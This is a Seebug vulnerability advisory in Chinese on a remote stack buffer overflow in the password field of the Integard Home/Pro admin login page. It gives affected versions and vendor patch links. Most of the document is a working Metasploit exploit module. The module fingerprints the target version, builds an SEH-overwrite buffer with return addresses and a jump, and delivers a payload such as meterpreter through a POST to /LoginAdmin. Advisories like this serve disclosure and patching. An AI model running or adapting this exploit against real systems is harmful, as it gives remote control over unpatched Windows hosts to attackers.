Integard Home和Pro HTTP请求远程栈溢出漏洞

2010-09-09T00:00:00
ID SSV:20107
Type seebug
Reporter Root
Modified 2010-09-09T00:00:00

Description

Integard Home和Pro分别是家用和企业级的上网内容监控和过滤系统。

Integard服务器18881端口上的管理页面存在栈溢出漏洞。远程攻击者可以通过在口令字段中提供超长字符串来触发这个溢出,导致完全控制应用和操作系统。

Race River Integard Home 2.0.0.9021 Race River Integard Pro 2.2.0.9026 厂商补丁:

Race River

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.integard.com.au/Release_Notes_Home.htm http://www.integard.com.au/Release_Notes_Pro.htm

                                        
                                            
                                                
class Metasploit3 < Msf::Exploit::Remote
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end
 
    #Current version does not work with bind() type of payloads
    #meterpreter, windows/exec  etc works fine
 
    def exploit
        mytarget = target
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
            sock.put(get)
            data = sock.recv(1024)
                if (data =~ /Content-Length: 24584/)
                    print_status("[!] Found Version - Integard Home")
                    mytarget = self.targets[1]
                end
                if (data =~ /Content-Length: 23196/)
                    print_status("[!] Found Version - Integard Pro")
                    mytarget = self.targets[2]
                end
            sock.close
        end
        connect
        print_status("[!] Selected Target: #{mytarget.name}")
        print_status("[*] Building Buffer")
        pay = payload.encoded
        junk = rand_text_alpha_upper(3091 - pay.length)
        jmp = "\xE9\x2B\xF8\xFF\xFF"
        nseh = "\xEB\xF9\x90\x90"
        seh = [mytarget.ret].pack('V')
        buffer = junk + pay + jmp + nseh + seh
        print_status("[*] Sending Request")
        req = "POST /LoginAdmin HTTP/1.1\r\n"
        req << "Host: 192.168.2.129:18881\r\n"
        req << "Content-Length: 1074\r\n\r\n"
        req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
        sock.put(req)
        print_status("[*] Request Sent")
        sock.close
        handler
    end
end